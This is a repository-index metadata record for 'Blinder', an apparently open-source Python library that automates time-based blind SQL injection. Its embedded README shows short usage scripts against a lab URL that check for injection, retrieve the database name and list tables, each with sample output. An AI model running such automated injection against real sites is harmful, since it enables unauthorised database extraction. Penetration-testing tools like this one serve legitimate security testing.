{"id":13542206,"url":"https://github.com/mhaskar/Blinder","last_synced_at":"2025-04-02T09:33:25.959Z","repository":{"id":112692285,"uuid":"190100691","full_name":"mhaskar/Blinder","owner":"mhaskar","description":"A python library to automate time-based blind SQL injection","archived":false,"fork":false,"pushed_at":"2019-09-15T07:42:53.000Z","size":28,"stargazers_count":49,"open_issues_count":0,"forks_count":17,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-11-03T07:33:11.980Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mhaskar.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2019-06-04T00:23:28.000Z","updated_at":"2024-08-19T07:31:14.000Z","dependencies_parsed_at":null,"dependency_job_id":"2c8bf895-869e-4eb0-9902-bdbdcca66dff","html_url":"https://github.com/mhaskar/Blinder","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FBlinder","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FBlinder/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FBlinder/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mhaskar%2FBlinder/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mhaskar","download_url":"https://codeload.github.com/mhaskar/Blinder/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246789264,"owners_count":20834261,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T10:01:02.854Z","updated_at":"2025-04-02T09:33:25.561Z","avatar_url":"https://github.com/mhaskar.png","language":"Python","readme":"# Blinder\n\nBlidner is a small python library to automate time-based blind SQL injection by using a pre defined queries as a functions to automate a rapid PoC development.\n\n# Installation\n\nYou can install Blinder using the following command:\n\n`pip install blinder`\n\nOr by downloading the source and importing it manually to your project.\n\n# Usage\n\nTo use blinder you need to import `Blinder` module then start using the main functions of Blinder.\n\nYou can use Blinder \"with the current version\" to do the following:\n\n* Check for time based injection.\n* Get database name.\n* Get tables names.\n\n**You can check for injection in a URL using the following code:**\n\n```\n#!/usr/bin/python\n\nimport Blinder\n\nblind = Blinder.blinder(\n    \"http://sqli-lab/sql_injection/index.php?search=3\",\n    sleep=1\n )\n\nprint blind.check_injection()\n\n```\n\nThe execution result will be:\n\n```\nroot@kali:~/Desktop# python check.py\nTrue\nroot@kali:~/Desktop#\n```\n**You can Get database name using the following code:**\n\n```\n#!/usr/bin/python\n\nimport Blinder\n\nblind = Blinder.blinder(\n    \"http://sqli-lab/sql_injection/index.php?search=3\",\n    sleep=1\n )\n\nprint \"Database name is : %s \" % blind.get_database()\n\n```\n\nAnd the results will be:\n\n```\nroot@kali:~/Desktop# python get-database.py\nDatabase name is : db1\nroot@kali:~/Desktop#\n```\n\n**To get tables names you can use the following code:**\n\n```\n#!/usr/bin/python\n\nimport Blinder\n\nblind = Blinder.blinder(\n    \"http://sqli-lab/sql_injection/index.php?search=3\",\n    sleep=1\n )\n\ntables = blind.get_tables()\n\nfor table in tables:\n    print table\n\n```\nAnd the results will be:\n\n```\nroot@kali:~/Desktop# python get-tables.py\nblogs\nnotes\nroot@kali:~/Desktop#\n```\n# TODO\n\nA lot of features should be added soon like:\n\n* [ ] the ability of adding customized query\n* [ ] test injection points based on burp request\n* [ ] extract tables/columns data\n","funding_links":[],"categories":["Exploitation"],"sub_categories":["SQL Injection"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmhaskar%2FBlinder","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmhaskar%2FBlinder","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmhaskar%2FBlinder/lists"}